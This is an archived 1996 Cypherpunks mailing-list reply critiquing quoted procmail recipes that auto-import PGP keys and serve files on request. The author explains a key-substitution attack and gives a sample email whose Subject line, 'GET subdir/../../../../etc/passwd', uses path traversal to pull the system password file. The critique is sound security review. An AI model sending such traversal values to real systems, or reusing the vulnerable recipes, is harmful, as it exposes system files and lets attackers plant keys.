[66106] in Cypherpunks
Re: How to use procmail
daemon@ATHENA.MIT.EDU (Igor Chudov @ home)
Sun Sep 22 01:07:23 1996
To: adam@homeport.org (Adam Shostack)
Date: Sat, 21 Sep 1996 23:23:26 -0500 (CDT)
Cc: janzen@idacom.hp.com, cypherpunks@toad.com
Reply-To: ichudov@algebra.com (Igor Chudov)
In-Reply-To: <199609050006.TAA07462@homeport.org> from "Adam Shostack" at Sep 4, 96 07:06:33 pm
From: ichudov@algebra.com (Igor Chudov @ home)
Adam Shostack wrote:
> :0
> * From bal@swissnet.ai.mit.edu
> {
> :0 h
> * >10000
> /dev/null
>
> :0 h
> *^Subject:.*no keys match
> /dev/null
>
> :0:
> *Subject: Your command, ADD
> $DEFAULT
>
>
> :0E
> | pgp +batchmode -fka
Isn't this vulnerable to "deadbeef" attacks? I can also see an attack when
someone sends you an email with the spooofed "From " address and a user
name that is the same (or almost the same) as that of your trusted parties.
Suppose that you correspond with mrx@provider.com and you use encryption
command
pgp -eaf mrx
Then I can send you a bogus email containing a key for mrx@bogus.com
and next time you encrypt something for your friend nrx@provider.com,
you will actually encrypt it with the wron key. If I intercept your
email, your message to mrx can be compromised.
> # basic file server. Only sends whats in .outbound
> :0
> * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$
> * !^Subject:.*[ /.]\.
> * !^FROM_DAEMON
> {
> # FILE=`formail -x Subject: | sed 's/.* //'`
> FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'`
>
> :0c
> | (formail -rt -A"Precedence: junk";\
> cat $HOME/.outbound/$FILE) | $SENDMAIL -t
*If* .outbound has some subdirectories (say subdir), How about this email:
From: dumbass@aol.com
Subject: GET subdir/../../../../etc/passwd
Reply-To: blin@algebra.com
xxx
- Igor.